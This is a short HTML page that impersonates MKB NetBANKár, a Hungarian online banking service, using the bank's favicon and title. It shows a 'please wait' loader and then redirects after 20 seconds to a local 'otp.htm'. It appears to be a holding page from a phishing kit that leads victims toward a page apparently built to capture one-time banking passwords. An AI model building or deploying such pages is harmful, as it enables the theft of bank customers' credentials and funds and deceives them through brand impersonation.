 

<!Doctype HTML>
<html>
<head>
<meta http-equiv="refresh" content="20;url=otp.htm" />
<link rel="icon" href="https://www.mkbnetbankar.hu/resources/images/mkb/icon_mkb_logo.ico">
<title>MKB NetBANKár</title>

</head>
 <body style="background-color:#FFFFFF;">
<div>
</div>
 
 </br></br></br></br></br></br></br> </br></br></br></br></br></br></br>
<div style="left: 242px; top: 311px; text-align:center;">
<div>
<div><img src="preloader_anim.svg">
</div><br>Kérem várjon...</div></div>
 

 
</body>